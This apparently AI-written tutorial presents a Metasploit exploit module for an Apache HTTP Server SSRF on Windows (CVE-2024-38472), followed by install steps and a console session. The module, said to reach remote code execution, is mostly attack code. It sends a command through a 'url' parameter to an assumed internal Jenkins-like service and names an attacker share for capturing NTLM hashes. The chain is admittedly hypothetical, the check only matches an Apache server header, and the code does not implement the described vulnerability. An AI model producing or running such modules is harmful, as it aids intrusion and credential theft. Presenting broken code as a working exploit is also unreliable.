Creating a Remote Code Execution (RCE) Metasploit module for the SSRF vulnerability (CVE-2024-38472) in Apache HTTP Server on Windows is challenging because SSRF itself doesn't directly result in RCE. However, SSRF can often be a step toward achieving RCE, especially if you can use it to interact with internal services or trigger a secondary vulnerability.
To achieve RCE through SSRF, we would generally need:
- An internal service vulnerable to a specific attack that can be exploited via SSRF.
- A misconfiguration or additional vulnerability that allows for arbitrary code execution.
For this example, let's assume that we can trigger a secondary service internally that accepts HTTP requests and can be tricked into executing arbitrary code (like a Jenkins server or another service with an exposed API).
We'll craft a Metasploit module that attempts to achieve RCE by exploiting the SSRF to interact with an internal service. In this case, we'll simulate an internal Jenkins server with an exposed script console that we can abuse for RCE.
Save the following code as apache_unc_ssrf_rce.rb in the modules/exploits/multi/http directory of your Metasploit Framework installation.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache HTTP Server Windows UNC SSRF to RCE',
'Description' => %q{
This module exploits a Server-Side Request Forgery (SSRF) vulnerability in Apache HTTP Server on Windows,
which can potentially be leveraged to achieve Remote Code Execution (RCE) by interacting with internal
services like Jenkins.
},
'Author' =>
[
'Your Name' # Your name or handle
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2024-38472'],
['URL', 'https://example.com/advisory'] # Replace with an advisory link if available
],
'DisclosureDate' => 'Aug 03 2024',
'Platform' => ['win'],
'Arch' => [ARCH_CMD],
'Targets' => [
['Windows', { 'Arch' => ARCH_CMD, 'Platform' => 'win' }]
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RHOSTS,
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, "The base path to the vulnerable application", '/']),
OptString.new('UNC_SERVER', [ true, "UNC path of the malicious server to receive NTLM hashes", '\\\\attacker-server\\share']),
OptString.new('INTERNAL_SERVICE', [ true, "Internal service URL to exploit for RCE", 'http://internal-service/script']),
OptString.new('CMD', [ true, "Command to execute", 'calc.exe'])
])
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
})
if res && res.headers['Server'] && res.headers['Server'].include?('Apache')
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
ssrf_payload = {
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'version' => '1.1',
'headers' => {
'Host' => datastore['RHOSTS'],
'Content-Type' => 'application/x-www-form-urlencoded'
},
'data' => "url=#{datastore['INTERNAL_SERVICE']}?script=#{Rex::Text.uri_encode(datastore['CMD'])}"
}
begin
print_status("Sending SSRF request to #{datastore['RHOSTS']}:#{datastore['RPORT']}#{target_uri.path}")
res = send_request_cgi(ssrf_payload)
if res && res.code == 200
print_good("Successfully triggered the internal service")
else
print_error("Failed to trigger the internal service: #{res.inspect}")
end
rescue ::Rex::ConnectionError => e
print_error("Connection failed: #{e.message}")
rescue ::Interrupt
print_status("User interrupted the module execution")
rescue ::Exception => e
print_error("An unexpected error occurred: #{e.message}")
end
end
end-
Save the Module: Save the module as
apache_unc_ssrf_rce.rbin themodules/exploits/multi/httpdirectory of your Metasploit Framework installation./path/to/metasploit-framework/modules/exploits/multi/http/apache_unc_ssrf_rce.rb
-
Load Metasploit: Start Metasploit Framework by opening a terminal and running:
msfconsole
-
Use the New Module: In the Metasploit console, load the new exploit module using the following command:
use exploit/multi/http/apache_unc_ssrf_rce
-
Configure and Run: Set the necessary options, such as
RHOSTS,RPORT,TARGETURI,UNC_SERVER,INTERNAL_SERVICE, andCMD. Then run the module.msf6 > use exploit/multi/http/apache_unc_ssrf_rce msf6 exploit(multi/http/apache_unc_ssrf_rce) > set RHOSTS target_ip RHOSTS => target_ip msf6 exploit(multi/http/apache_unc_ssrf_rce) > set RPORT 80 RPORT => 80 msf6 exploit(multi/http/apache_unc_ssrf_rce) > set TARGETURI / TARGETURI => / msf6 exploit(multi/http/apache_unc_ssrf_rce) > set UNC_SERVER \\\\attacker-server\\share UNC_SERVER => \\attacker-server\share msf6 exploit(multi/http/apache_unc_ssrf_rce) > set INTERNAL_SERVICE http://internal-service/script INTERNAL_SERVICE => http://internal-service/script msf6 exploit(multi/http/apache_unc_ssrf_rce) > set CMD calc.exe CMD => calc.exe msf6 exploit(multi/http/apache_unc_ssrf_rce) > run
- Ensure you have the appropriate permissions before testing or exploiting any systems.
- This module is designed for educational and testing purposes. Always test in a safe and controlled environment before using it on any production systems.
This enhanced Metasploit module sends a crafted request to the vulnerable Apache HTTP server on Windows, attempting to trigger the SSRF vulnerability and leverage it to achieve RCE by interacting with an internal service. Adjust the payload and module as necessary based on the specific nature of the vulnerability and the target environment.